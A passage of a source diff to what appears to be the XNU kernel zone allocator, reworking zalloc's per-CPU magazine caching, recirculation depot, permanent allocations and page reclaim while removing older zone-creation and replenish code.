@param flags The flags passed to @c zalloc_ext() (for Z_ZERO). + * @param elem_size The element size for this zone. + * @param freemag An optional magazine that needs to be freed. + */ +__attribute__((noinline)) +static void * +zalloc_return(zone_t zone, zone_element_t ze, zalloc_flags_t flags, + vm_offset_t elem_size, zone_magazine_t freemag) +{ + vm_offset_t addr = zone_element_addr(ze, elem_size); + +#if KASAN_ZALLOC + if (zone->z_percpu) { + zpercpu_foreach_cpu(i) { + kasan_poison_range(addr + ptoa(i), elem_size, + ASAN_VALID); + } } else { - z->z_name = name; + kasan_poison_range(addr, elem_size, ASAN_VALID); + } +#endif +#if ZALLOC_ENABLE_POISONING + zalloc_validate_element(zone, addr, elem_size, zone_element_prot(ze)); +#endif /* ZALLOC_ENABLE_POISONING */ +#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS + if (__improbable(zalloc_should_log_or_trace_leaks(zone, elem_size))) { + zalloc_log_or_trace_leaks(zone, addr, __builtin_frame_address(0)); + } +#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */ +#if KASAN_ZALLOC + if (zone->z_kasan_redzone) { + addr = kasan_alloc(addr, elem_size, + elem_size - 2 * zone->z_kasan_redzone, + zone->z_kasan_redzone); + elem_size -= 2 * zone->z_kasan_redzone; } /* - * If zone_init() hasn't run yet, the permanent zones do not exist. - * We can limp along without properly initialized stats for a while, - * zone_init() will rebuild the missing stats when it runs. + * Initialize buffer with unique pattern only if memory + * wasn't expected to be zeroed. */ - if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) { - z->z_stats = zalloc_percpu_permanent_type(struct zone_stats); + if (!zone->z_free_zeroes && !(flags & Z_ZERO)) { + kasan_leak_init(addr, elem_size); + } +#endif /* KASAN_ZALLOC */ + if ((flags & Z_ZERO) && !zone->z_free_zeroes) { + bzero((void *)addr, elem_size); } - alloc = zone_get_min_alloc_granule(size, flags); - - if (flags & ZC_KALLOC_HEAP) { - size_t rem = (alloc % size) / (alloc / size); +#if VM_MAX_TAG_ZONES + if (__improbable(zone->tags)) { + vm_tag_t tag = zalloc_flags_get_tag(flags); + if (tag == VM_KERN_MEMORY_NONE) { + tag = VM_KERN_MEMORY_KALLOC; + } + // set the tag with b0 clear so the block remains inuse + *ztSlot(zone, addr) = (vm_tag_t)(tag << 1); + vm_tag_update_zone_size(tag, zone->tag_zone_index, + (long)elem_size); + } +#endif /* VM_MAX_TAG_ZONES */ - /* - * Try to grow the elements size and spread them more if the remaining - * space is large enough. - */ - size += rem & ~(KALLOC_MINALIGN - 1); + TRACE_MACHLEAKS(ZALLOC_CODE, ZALLOC_CODE_2, elem_size, addr); + DTRACE_VM2(zalloc, zone_t, zone, void*, addr); + if (freemag) { + zone_magazine_free(freemag); } + return (void *)addr; +} - z->pcpu_elem_size = z->z_elem_size = (uint16_t)size; - z->alloc_pages = (uint16_t)atop(alloc); -#if KASAN_ZALLOC - z->kasan_redzone = redzone; - if (strncmp(name, "fakestack.", sizeof("fakestack.") - 1) == 0) { - z->kasan_fakestacks = true; +#if CONFIG_GZALLOC +/*! + * @function zalloc_gz + * + * @brief + * Performs allocations for zones using gzalloc. + * + * @discussion + * This function is noinline so that it doesn't affect the codegen + * of the fastpath. + */ +__attribute__((noinline)) +static void * +zalloc_gz(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) +{ + vm_offset_t addr = gzalloc_alloc(zone, zstats, flags); + return zalloc_return(zone, zone_element_encode(addr, 0, ZPM_AUTO), + flags, zone_elem_size(zone), NULL); +} +#endif /* CONFIG_GZALLOC */ + +static void * +zalloc_item_fast(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) +{ + vm_size_t esize = zone_elem_size(zone); + zone_element_t ze; + + zalloc_import(zone, &ze, 1); + zone_elems_free_sub(zone, 1); + zpercpu_get(zstats)->zs_mem_allocated += esize; + zone_unlock(zone); + + return zalloc_return(zone, ze, flags, esize, NULL); +} + +/*! + * @function zalloc_item_slow + * + * @brief + * Performs allocations when the zone is out of elements. + * + * @discussion + * This function might drop the lock and reenable preemption, + * which means the per-CPU caching layer or recirculation depot + * might have received elements. + */ +__attribute__((noinline)) +static void * +zalloc_item_slow(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) +{ + if (zone->z_replenishes) { + zone_replenish_locked(zone); + } else { + if ((flags & Z_NOWAIT) == 0) { + zone_expand_locked(zone, flags, zalloc_needs_refill); + } + if (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) { + zone_expand_async_schedule_if_needed(zone); + } + if (__improbable(zone->z_elems_free == 0)) { + zone_unlock(zone); + if (__improbable(flags & Z_NOFAIL)) { + zone_nofail_panic(zone); + } + DTRACE_VM2(zalloc, zone_t, zone, void*, NULL); + return NULL; + } } -#endif /* - * Handle KPI flags + * We might have changed core or got preempted/blocked while expanding + * the zone. Allocating from the zone when the recirculation depot + * is not empty is not allowed. + * + * It will be rare but possible for the depot to refill while we were + * waiting for pages. If that happens we need to start over. */ -#if __LP64__ - if (flags & ZC_SEQUESTER) { - z->va_sequester = true; + if (!STAILQ_EMPTY(&zone->z_recirc)) { + zone_unlock(zone); + return zalloc_ext(zone, zstats, flags); } -#endif - /* ZC_CACHING applied after all configuration is done */ - if (flags & ZC_PERCPU) { - /* - * ZC_CACHING is disallowed because it uses per-cpu zones for its - * implementation and it would be circular. These allocations are - * also quite expensive, so caching feels dangerous memory wise too. - * - * ZC_ZFREE_CLEARMEM is forced because per-cpu zones allow for - * pointer-sized allocations which poisoning doesn't support. - */ - zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_CACHING); - zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN); - z->percpu = true; - z->gzalloc_exempt = true; - z->zfree_clear_mem = true; - z->pcpu_elem_size *= zpercpu_count(); - } - if (flags & ZC_ZFREE_CLEARMEM) { - z->zfree_clear_mem = true; - } - if (flags & ZC_NOGC) { - z->collectable = false; - } - if (flags & ZC_NOENCRYPT) { - z->noencrypt = true; - } - if (flags & ZC_ALIGNMENT_REQUIRED) { - z->alignment_required = true; - } - if (flags & ZC_NOGZALLOC) { - z->gzalloc_exempt = true; - } - if (flags & ZC_NOCALLOUT) { - z->no_callout = true; - } - if (flags & ZC_DESTRUCTIBLE) { - zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_CACHING); - zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_ALLOW_FOREIGN); - z->destructible = true; - } + return zalloc_item_fast(zone, zstats, flags); +} + +/*! + * @function zalloc_item + * + * @brief + * Performs allocations when zone caching is off. + * + * @discussion + * This function calls @c zalloc_item_slow() when refilling the zone + * is needed, or @c zalloc_item_fast() if the zone has enough free elements. + */ +static void * +zalloc_item(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) +{ + zone_lock_check_contention(zone, NULL); /* - * Handle Internal flags + * When we commited to the zalloc_item() path, + * zone caching might have been flipped/enabled. + * + * If we got preempted for long enough, the recirculation layer + * can have been populated, and allocating from the zone would be + * incorrect. + * + * So double check for this extremely rare race here. */ - if (flags & ZC_ALLOW_FOREIGN) { - z->allows_foreign = true; + if (__improbable(!STAILQ_EMPTY(&zone->z_recirc))) { + zone_unlock(zone); + return zalloc_ext(zone, zstats, flags); } - if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) && - (flags & ZC_DATA_BUFFERS)) { - z->submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP; + + if (__improbable(zone->z_elems_free <= zone->z_elems_rsv)) { + return zalloc_item_slow(zone, zstats, flags); } - if (flags & ZC_KASAN_NOQUARANTINE) { - z->kasan_noquarantine = true; + + return zalloc_item_fast(zone, zstats, flags); +} + +static void * +zalloc_cached_fast(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags, + zone_cache_t cache, zone_magazine_t freemag) +{ + vm_offset_t esize = zone_elem_size(zone); + zone_element_t ze; + uint32_t index; + + index = --cache->zc_alloc_cur; + if (index >= zc_mag_size()) { + zone_accounting_panic(zone, "zc_alloc_cur wrap around"); } - /* ZC_KASAN_NOREDZONE already handled */ + ze = cache->zc_alloc_elems[index]; + cache->zc_alloc_elems[index].ze_value = 0; - /* - * Then if there's extra tuning, do it - */ - if (extra_setup) { - extra_setup(z); + zpercpu_get(zstats)->zs_mem_allocated += esize; + enable_preemption(); + + if (zone_meta_is_free(zone_meta_from_element(ze), ze)) { + zone_meta_double_free_panic(zone, ze, __func__); } - /* - * Configure debugging features - */ -#if CONFIG_GZALLOC - gzalloc_zone_init(z); /* might set z->gzalloc_tracked */ -#endif -#if ZONE_ENABLE_LOGGING - if (!z->gzalloc_tracked && num_zones_logged < max_num_zones_to_log) { - /* - * Check for and set up zone leak detection if requested via boot-args. - * might set z->zone_logging - */ - zone_setup_logging(z); + return zalloc_return(zone, ze, flags, esize, freemag); +} + +static void * +zalloc_cached_from_depot(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags, + zone_cache_t cache, zone_cache_t depot, zone_magazine_t mag) +{ + STAILQ_REMOVE_HEAD(&depot->zc_depot, zm_link); + if (depot->zc_depot_cur-- == 0) { + zone_accounting_panic(zone, "zc_depot_cur wrap-around"); } -#endif /* ZONE_ENABLE_LOGGING */ -#if VM_MAX_TAG_ZONES - if (!z->gzalloc_tracked && z->kalloc_heap && zone_tagging_on) { - static int tag_zone_index; - vm_offset_t esize = zone_elem_size(z); - z->tags = true; - z->tags_inline = (((page_size + esize - 1) / esize) <= - (sizeof(uint32_t) / sizeof(uint16_t))); - z->tag_zone_index = os_atomic_inc_orig(&tag_zone_index, relaxed); - assert(z->tag_zone_index < VM_MAX_TAG_ZONES); + zone_depot_unlock_nopreempt(depot); + + mag = zone_magazine_replace(&cache->zc_alloc_cur, + &cache->zc_alloc_elems, mag); + + z_debug_assert(cache->zc_alloc_cur == zc_mag_size()); + z_debug_assert(mag->zm_cur == 0); + + if (zone == zc_magazine_zone) { + enable_preemption(); + bzero(mag, zone_elem_size(zone)); + return mag; } -#endif + + return zalloc_cached_fast(zone, zstats, flags, cache, mag); +} + +__attribute__((noinline)) +static void * +zalloc_cached_slow(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags, + zone_cache_t cache) +{ + zone_magazine_t mag = NULL; + struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags); /* - * Finally, fixup properties based on security policies, boot-args, ... + * Try to allocate from our local depot, if there's one. */ - if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) && - z->kalloc_heap == KHEAP_ID_DATA_BUFFERS) { - z->submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP; - } -#if __LP64__ - if ((ZSECURITY_OPTIONS_SEQUESTER & zsecurity_options) && - (flags & ZC_NOSEQUESTER) == 0 && - z->submap_idx == Z_SUBMAP_IDX_GENERAL_MAP) { - z->va_sequester = true; + if (STAILQ_FIRST(&cache->zc_depot)) { + zone_depot_lock_nopreempt(cache); + + if ((mag = STAILQ_FIRST(&cache->zc_depot)) != NULL) { + return zalloc_cached_from_depot(zone, zstats, flags, + cache, cache, mag); + } + + zone_depot_unlock_nopreempt(cache); } -#endif + + zone_lock_nopreempt_check_contention(zone, cache); + /* - * Always clear zone elements smaller than a cacheline, - * because it's pretty close to free. + * If the recirculation depot is empty, we'll need to import. + * The system is tuned for this to be extremely rare. */ - if (size <= zp_min_size) { - z->zfree_clear_mem = true; - } - if (zp_factor != 0 && !z->zfree_clear_mem) { - z->zp_count = zone_poison_count_init(z); - } + if (__improbable(STAILQ_EMPTY(&zone->z_recirc))) { + uint16_t n_elems = zc_mag_size(); -#if CONFIG_ZCACHE - if ((flags & ZC_NOCACHING) == 0) { - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - char temp_zone_name[MAX_ZONE_NAME] = ""; - snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name); + if (zone->z_elems_free < n_elems + zone->z_elems_rsv / 2 && + os_sub_overflow(zone->z_elems_free, + zone->z_elems_rsv / 2, &n_elems)) { + n_elems = 0; + } - /* Check if boot-arg specified it should have a cache */ - if (track_this_zone(temp_zone_name, cache_zone_name)) { - flags |= ZC_CACHING; - } else if (zcc_kalloc && z->kalloc_heap) { - flags |= ZC_CACHING; + z_debug_assert(n_elems <= zc_mag_size()); + + if (__improbable(n_elems == 0)) { + /* + * If importing elements would deplete the zone, + * call zalloc_item_slow() + */ + return zalloc_item_slow(zone, zstats, flags); } + + if (__improbable(zone_caching_disabled)) { + if (__improbable(zone_caching_disabled < 0)) { + /* + * In the first 10s after boot, mess with + * the scan position in order to make early + * allocations patterns less predictible. + */ + zone_early_scramble_rr(zone, zstats); + } + return zalloc_item_fast(zone, zstats, flags); + } + + zalloc_import(zone, cache->zc_alloc_elems, n_elems); + + cache->zc_alloc_cur = n_elems; + zone_elems_free_sub(zone, n_elems); + + zone_unlock_nopreempt(zone); + + return zalloc_cached_fast(zone, zstats, flags, cache, NULL); } - if ((flags & ZC_CACHING) && - !z->tags && !z->zone_logging && !z->gzalloc_tracked) { - zcache_init(z); - } -#endif /* CONFIG_ZCACHE */ - lock_zone(z); - z->z_self = z; - unlock_zone(z); + uint16_t n_mags = 0; - return z; + /* + * If the recirculation depot has elements, then try to fill + * the local per-cpu depot to (1 / zc_recirc_denom) + */ + do { + mag = STAILQ_FIRST(&zone->z_recirc); + STAILQ_REMOVE_HEAD(&zone->z_recirc, zm_link); + STAILQ_INSERT_TAIL(&mags, mag, zm_link); + n_mags++; + + for (uint16_t i = 0; i < zc_mag_size(); i++) { + zone_element_t e = mag->zm_elems[i]; + + if (!zone_meta_mark_used(zone_meta_from_element(e), e)) { + zone_meta_double_free_panic(zone, e, __func__); + } + } + } while (!STAILQ_EMPTY(&zone->z_recirc) && + zc_recirc_denom * n_mags * zc_mag_size() <= cache->zc_depot_max); + + zone_elems_free_sub(zone, n_mags * zc_mag_size()); + zone_counter_sub(zone, z_recirc_cur, n_mags); + + zone_unlock_nopreempt(zone); + + /* + * And then incorporate everything into our per-cpu layer. + */ + mag = STAILQ_FIRST(&mags); + STAILQ_REMOVE_HEAD(&mags, zm_link); + mag = zone_magazine_replace(&cache->zc_alloc_cur, + &cache->zc_alloc_elems, mag); + z_debug_assert(cache->zc_alloc_cur == zc_mag_size()); + z_debug_assert(mag->zm_cur == 0); + + if (--n_mags > 0) { + zone_depot_lock_nopreempt(cache); + cache->zc_depot_cur += n_mags; + STAILQ_CONCAT(&cache->zc_depot, &mags); + zone_depot_unlock_nopreempt(cache); + } + + return zalloc_cached_fast(zone, zstats, flags, cache, mag); } -__startup_func -void -zone_create_startup(struct zone_create_startup_spec *spec) +/*! + * @function zalloc_cached + * + * @brief + * Performs allocations when zone caching is on. + * + * @discussion + * This function calls @c zalloc_cached_fast() when the caches have elements + * ready. + * + * Else it will call @c zalloc_cached_slow() so that the cache is refilled, + * which might switch to the @c zalloc_item_slow() track when the backing zone + * needs to be refilled. + */ +static void * +zalloc_cached(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) { - *spec->z_var = zone_create_ext(spec->z_name, spec->z_size, - spec->z_flags, spec->z_zid, spec->z_setup); + zone_cache_t cache; + + disable_preemption(); + cache = zpercpu_get(zone->z_pcpu_cache); + + if (cache->zc_alloc_cur == 0) { + if (__improbable(cache->zc_free_cur == 0)) { + return zalloc_cached_slow(zone, zstats, flags, cache); + } + zone_cache_swap_magazines(cache); + } + + return zalloc_cached_fast(zone, zstats, flags, cache, NULL); } -/* - * The 4 first field of a zone_view and a zone alias, so that the zone_or_view_t - * union works. trust but verify. +/*! + * @function zalloc_ext + * + * @brief + * The core implementation of @c zalloc(), @c zalloc_flags(), @c zalloc_percpu(). */ -#define zalloc_check_zov_alias(f1, f2) \ - static_assert(offsetof(struct zone, f1) == offsetof(struct zone_view, f2)) -zalloc_check_zov_alias(z_self, zv_zone); -zalloc_check_zov_alias(z_stats, zv_stats); -zalloc_check_zov_alias(z_name, zv_name); -zalloc_check_zov_alias(z_views, zv_next); -#undef zalloc_check_zov_alias - -__startup_func -void -zone_view_startup_init(struct zone_view_startup_spec *spec) +void * +zalloc_ext(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) { - struct kalloc_heap *heap = NULL; - zone_view_t zv = spec->zv_view; - zone_t z; + /* + * KASan uses zalloc() for fakestack, which can be called anywhere. + * However, we make sure these calls can never block. + */ + assert(zone->kasan_fakestacks || + ml_get_interrupts_enabled() || + ml_is_quiescing() || + debug_mode_active() || + startup_phase < STARTUP_SUB_EARLY_BOOT); - switch (spec->zv_heapid) { - case KHEAP_ID_DEFAULT: - heap = KHEAP_DEFAULT; - break; - case KHEAP_ID_DATA_BUFFERS: - heap = KHEAP_DATA_BUFFERS; - break; - case KHEAP_ID_KEXT: - heap = KHEAP_KEXT; - break; - default: - heap = NULL; + /* + * Make sure Z_NOFAIL was not obviously misused + */ + if (zone->z_replenishes) { + assert((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0); + } else if (flags & Z_NOFAIL) { + assert(!zone->exhaustible && + (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0); } - if (heap) { - z = kalloc_heap_zone_for_size(heap, spec->zv_size); - assert(z); - } else { - z = spec->zv_zone; - assert(spec->zv_size <= zone_elem_size(z)); +#if CONFIG_GZALLOC + if (__improbable(zone->gzalloc_tracked)) { + return zalloc_gz(zone, zstats, flags); } +#endif /* CONFIG_GZALLOC */ - zv->zv_zone = z; - zv->zv_stats = zalloc_percpu_permanent_type(struct zone_stats); - zv->zv_next = z->z_views; - if (z->z_views == NULL && z->kalloc_heap == KHEAP_ID_NONE) { - /* - * count the raw view for zones not in a heap, - * kalloc_heap_init() already counts it for its members. - */ - zone_view_count += 2; - } else { - zone_view_count += 1; + if (zone->z_pcpu_cache) { + return zalloc_cached(zone, zstats, flags); } - z->z_views = zv; + + return zalloc_item(zone, zstats, flags); } -zone_t -zone_create( - const char *name, - vm_size_t size, - zone_create_flags_t flags) +void * +zalloc(union zone_or_view zov) { - return zone_create_ext(name, size, flags, ZONE_ID_ANY, NULL); + return zalloc_flags(zov, Z_WAITOK); } -zone_t -zinit( - vm_size_t size, /* the size of an element */ - vm_size_t max, /* maximum memory to use */ - vm_size_t alloc __unused, /* allocation size */ - const char *name) /* a name for the zone */ +void * +zalloc_noblock(union zone_or_view zov) +{ + return zalloc_flags(zov, Z_NOWAIT); +} + +void * +zalloc_flags(union zone_or_view zov, zalloc_flags_t flags) { - zone_t z = zone_create(name, size, ZC_DESTRUCTIBLE); - zone_set_max(z, max); - return z; + zone_t zone = zov.zov_view->zv_zone; + zone_stats_t zstats = zov.zov_view->zv_stats; + assert(!zone->z_percpu); + return zalloc_ext(zone, zstats, flags); } -void -zdestroy(zone_t z) +void * +zalloc_percpu(union zone_or_view zov, zalloc_flags_t flags) { - unsigned int zindex = zone_index(z); + zone_t zone = zov.zov_view->zv_zone; + zone_stats_t zstats = zov.zov_view->zv_stats; + assert(zone->z_percpu); + return (void *)__zpcpu_mangle(zalloc_ext(zone, zstats, flags)); +} - lock_zone(z); +static void * +_zalloc_permanent(zone_t zone, vm_size_t size, vm_offset_t mask) +{ + struct zone_page_metadata *page_meta; + vm_offset_t offs, addr; + zone_pva_t pva; - if (!z->destructible || zone_caching_enabled(z) || z->allows_foreign) { - panic("zdestroy: Zone %s%s isn't destructible", - zone_heap_name(z), z->z_name); - } + assert(ml_get_interrupts_enabled() || + ml_is_quiescing() || + debug_mode_active() || + startup_phase < STARTUP_SUB_EARLY_BOOT); - if (!z->z_self || z->expanding_no_vm_priv || z->expanding_vm_priv || - z->async_pending || z->waiting) { - panic("zdestroy: Zone %s%s in an invalid state for destruction", - zone_heap_name(z), z->z_name); - } + size = (size + mask) & ~mask; + assert(size <= PAGE_SIZE); -#if !KASAN_ZALLOC - /* - * Unset the valid bit. We'll hit an assert failure on further operations - * on this zone, until zinit() is called again. - * - * Leave the zone valid for KASan as we will see zfree's on quarantined free - * elements even after the zone is destroyed. - */ - z->z_self = NULL; -#endif - z->destroyed = true; - unlock_zone(z); + zone_lock(zone); + assert(zone->z_self == zone); - /* Dump all the free elements */ - zone_drop_free_elements(z); + for (;;) { + pva = zone->z_pageq_partial; + while (!zone_pva_is_null(pva)) { + page_meta = zone_pva_to_meta(pva); + if (page_meta->zm_bump + size <= PAGE_SIZE) { + goto found; + } + pva = page_meta->zm_page_next; + } -#if CONFIG_GZALLOC - if (__improbable(z->gzalloc_tracked)) { - /* If the zone is gzalloc managed dump all the elements in the free cache */ - gzalloc_empty_free_cache(z); + zone_expand_locked(zone, Z_WAITOK, NULL); } -#endif - - lock_zone(z); - while (!zone_pva_is_null(z->pages_sequester)) { - struct zone_page_metadata *page_meta; - vm_offset_t free_addr; - - page_meta = zone_sequestered_page_get(z, &free_addr); - unlock_zone(z); - kmem_free(submap_for_zone(z), free_addr, ptoa(z->alloc_pages)); - lock_zone(z); - } +found: + offs = (uint16_t)((page_meta->zm_bump + mask) & ~mask); + page_meta->zm_bump = (uint16_t)(offs + size); + page_meta->zm_alloc_size += size; + zone->z_elems_free -= size; + zpercpu_get(zone->z_stats)->zs_mem_allocated += size; -#if !KASAN_ZALLOC - /* Assert that all counts are zero */ - if (z->countavail || z->countfree || zone_size_wired(z) || - z->allfree_page_count || z->sequester_page_count) { - panic("zdestroy: Zone %s%s isn't empty at zdestroy() time", - zone_heap_name(z), z->z_name); + if (page_meta->zm_alloc_size >= PAGE_SIZE - sizeof(vm_offset_t)) { + zone_meta_requeue(zone, &zone->z_pageq_full, page_meta); } - /* consistency check: make sure everything is indeed empty */ - assert(zone_pva_is_null(z->pages_any_free_foreign)); - assert(zone_pva_is_null(z->pages_all_used_foreign)); - assert(zone_pva_is_null(z->pages_all_free)); - assert(zone_pva_is_null(z->pages_intermediate)); - assert(zone_pva_is_null(z->pages_all_used)); - assert(zone_pva_is_null(z->pages_sequester)); -#endif - - unlock_zone(z); - - simple_lock(&all_zones_lock, &zone_locks_grp); + zone_unlock(zone); - assert(!bitmap_test(zone_destroyed_bitmap, zindex)); - /* Mark the zone as empty in the bitmap */ - bitmap_set(zone_destroyed_bitmap, zindex); - num_zones_in_use--; - assert(num_zones_in_use > 0); + addr = offs + zone_pva_to_addr(pva); - simple_unlock(&all_zones_lock); + DTRACE_VM2(zalloc, zone_t, zone, void*, addr); + return (void *)addr; } -#pragma mark zone (re)fill, jetsam - -/* - * Dealing with zone allocations from the mach VM code. - * - * The implementation of the mach VM itself uses the zone allocator - * for things like the vm_map_entry data structure. In order to prevent - * an infinite recursion problem when adding more pages to a zone, zalloc - * uses a replenish thread to refill the VM layer's zones before they have - * too few remaining free entries. The reserved remaining free entries - * guarantee that the VM routines can get entries from already mapped pages. - * - * In order for that to work, the amount of allocations in the nested - * case have to be bounded. There are currently 2 replenish zones, and - * if each needs 1 element of each zone to add a new page to itself, that - * gives us a minumum reserve of 2 elements. - * - * There is also a deadlock issue with the zone garbage collection thread, - * or any thread that is trying to free zone pages. While holding - * the kernel's map lock they may need to allocate new VM map entries, hence - * we need enough reserve to allow them to get past the point of holding the - * map lock. After freeing that page, the GC thread will wait in drop_free_elements() - * until the replenish threads can finish. Since there's only 1 GC thread at a time, - * that adds a minimum of 1 to the reserve size. - * - * Since the minumum amount you can add to a zone is 1 page, we'll use 16K (from ARM) - * as the refill size on all platforms. - * - * When a refill zone drops to half that available, i.e. REFILL_SIZE / 2, - * zalloc_ext() will wake the replenish thread. The replenish thread runs - * until at least REFILL_SIZE worth of free elements exist, before sleeping again. - * In the meantime threads may continue to use the reserve until there are only REFILL_SIZE / 4 - * elements left. Below that point only the replenish threads themselves and the GC - * thread may continue to use from the reserve. - */ -static unsigned zone_replenish_loops; -static unsigned zone_replenish_wakeups; -static unsigned zone_replenish_wakeups_initiated; -static unsigned zone_replenish_throttle_count; - -#define ZONE_REPLENISH_TARGET (16 * 1024) -static unsigned zone_replenish_active = 0; /* count of zones currently replenishing */ -static unsigned zone_replenish_max_threads = 0; +static void * +_zalloc_permanent_large(size_t size, vm_offset_t mask) +{ + kern_return_t kr; + vm_offset_t addr; -LCK_GRP_DECLARE(zone_replenish_lock_grp, "zone_replenish_lock"); -LCK_SPIN_DECLARE(zone_replenish_lock, &zone_replenish_lock_grp); + kr = kernel_memory_allocate(kernel_map, &addr, size, mask, + KMA_KOBJECT | KMA_PERMANENT | KMA_ZERO, + VM_KERN_MEMORY_KALLOC); + if (kr != 0) { + panic("zalloc_permanent: unable to allocate %zd bytes (%d)", + size, kr); + } + return (void *)addr; +} -__abortlike -static void -zone_replenish_panic(zone_t zone, kern_return_t kr) +void * +zalloc_permanent(vm_size_t size, vm_offset_t mask) { - panic_include_zprint = TRUE; -#if CONFIG_ZLEAKS - if ((zleak_state & ZLEAK_STATE_ACTIVE)) { - panic_include_ztrace = TRUE; - } -#endif /* CONFIG_ZLEAKS */ - if (kr == KERN_NO_SPACE) { - zone_t zone_largest = zone_find_largest(); - panic("zalloc: zone map exhausted while allocating from zone %s%s, " - "likely due to memory leak in zone %s%s " - "(%lu total bytes, %d elements allocated)", - zone_heap_name(zone), zone->z_name, - zone_heap_name(zone_largest), zone_largest->z_name, - (unsigned long)zone_size_wired(zone_largest), - zone_count_allocated(zone_largest)); + if (size <= PAGE_SIZE) { + zone_t zone = &zone_array[ZONE_ID_PERMANENT]; + return _zalloc_permanent(zone, size, mask); } - panic("zalloc: %s%s (%d elements) retry fail %d", - zone_heap_name(zone), zone->z_name, - zone_count_allocated(zone), kr); + return _zalloc_permanent_large(size, mask); } -static void -zone_replenish_locked(zone_t z, zalloc_flags_t flags, bool asynchronously) +void * +zalloc_percpu_permanent(vm_size_t size, vm_offset_t mask) { - int kmaflags = KMA_KOBJECT | KMA_ZERO; - vm_offset_t space, alloc_size; - uint32_t retry = 0; - kern_return_t kr; + zone_t zone = &zone_array[ZONE_ID_PERCPU_PERMANENT]; + return (void *)__zpcpu_mangle(_zalloc_permanent(zone, size, mask)); +} - if (z->noencrypt) { - kmaflags |= KMA_NOENCRYPT; - } - if (flags & Z_NOPAGEWAIT) { - kmaflags |= KMA_NOPAGEWAIT; - } - if (z->permanent) { - kmaflags |= KMA_PERMANENT; - } +/*! @} */ +#endif /* !ZALLOC_TEST */ +#pragma mark zone GC / trimming +#if !ZALLOC_TEST - for (;;) { - struct zone_page_metadata *page_meta = NULL; +static thread_call_data_t zone_defrag_callout; - /* - * Try to allocate our regular chunk of pages, - * unless the system is under massive pressure - * and we're looking for more than 2 pages. - */ - if (!z->percpu && z->alloc_pages > 2 && (vm_pool_low() || retry > 0)) { - alloc_size = round_page(zone_elem_size(z)); - } else { - alloc_size = ptoa(z->alloc_pages); - page_meta = zone_sequestered_page_get(z, &space); - } +static void +zone_reclaim_chunk(zone_t z, struct zone_page_metadata *meta, uint32_t free_count) +{ + vm_address_t page_addr; + vm_size_t size_to_free; + uint32_t bitmap_ref; + uint32_t page_count; + bool sequester = z->z_va_sequester && !z->z_destroyed; - unlock_zone(z); + zone_meta_queue_pop_native(z, &z->z_pageq_empty, &page_addr); -#if CONFIG_ZLEAKS - /* - * Do the zone leak activation here because zleak_activate() - * may block, and can't be done on the way out. - */ - if (__improbable(zleak_state & ZLEAK_STATE_ENABLED)) { - if (!(zleak_state & ZLEAK_STATE_ACTIVE) && - zone_submaps_approx_size() >= zleak_global_tracking_threshold) { - kr = zleak_activate(); - if (kr != KERN_SUCCESS) { - printf("Failed to activate live zone leak debugging (%d).\n", kr); - } - } - } -#endif /* CONFIG_ZLEAKS */ + page_count = meta->zm_chunk_len; - /* - * Trigger jetsams via the vm_pageout_garbage_collect thread if - * we're running out of zone memory - */ - if (is_zone_map_nearing_exhaustion()) { - thread_wakeup((event_t) &vm_pageout_garbage_collect); + if (meta->zm_alloc_size) { + zone_metadata_corruption(z, meta, "alloc_size"); + } + if (z->z_percpu) { + if (page_count != 1) { + zone_metadata_corruption(z, meta, "page_count"); } - - if (page_meta) { - kr = zone_sequestered_page_populate(z, page_meta, space, - alloc_size, kmaflags); - } else { - if (z->submap_idx == Z_SUBMAP_IDX_GENERAL_MAP && z->kalloc_heap != KHEAP_ID_NONE) { - kmaflags |= KMA_KHEAP; - } - kr = kernel_memory_allocate(submap_for_zone(z), - &space, alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE); + size_to_free = ptoa(z->z_chunk_pages); + os_atomic_sub(&zones_phys_page_mapped_count, + z->z_chunk_pages, relaxed); + } else { + if (page_count > z->z_chunk_pages) { + zone_metadata_corruption(z, meta, "page_count"); } - -#if !__LP64__ - if (kr == KERN_NO_SPACE && z->allows_foreign) { - /* - * For zones allowing foreign pages, fallback to the kernel map - */ - kr = kernel_memory_allocate(kernel_map, &space, - alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE); + if (page_count < z->z_chunk_pages) { + /* Dequeue non populated VA from z_pageq_va */ + zone_meta_remqueue(z, meta + page_count); } -#endif + size_to_free = ptoa(page_count); + os_atomic_sub(&zones_phys_page_mapped_count, page_count, relaxed); + } - if (kr == KERN_SUCCESS) { - break; - } + zone_counter_sub(z, z_elems_free, free_count); + zone_counter_sub(z, z_elems_avail, free_count); + zone_counter_sub(z, z_wired_empty, page_count); + zone_counter_sub(z, z_wired_cur, page_count); + if (z->z_elems_free_min < free_count) { + z->z_elems_free_min = 0; + } else { + z->z_elems_free_min -= free_count; + } + if (z->z_elems_free_max < free_count) { + z->z_elems_free_max = 0; + } else { + z->z_elems_free_max -= free_count; + } - if (flags & Z_NOPAGEWAIT) { - lock_zone(z); - return; + bitmap_ref = 0; + if (sequester) { + if (meta->zm_inline_bitmap) { + for (int i = 0; i < meta->zm_chunk_len; i++) { + 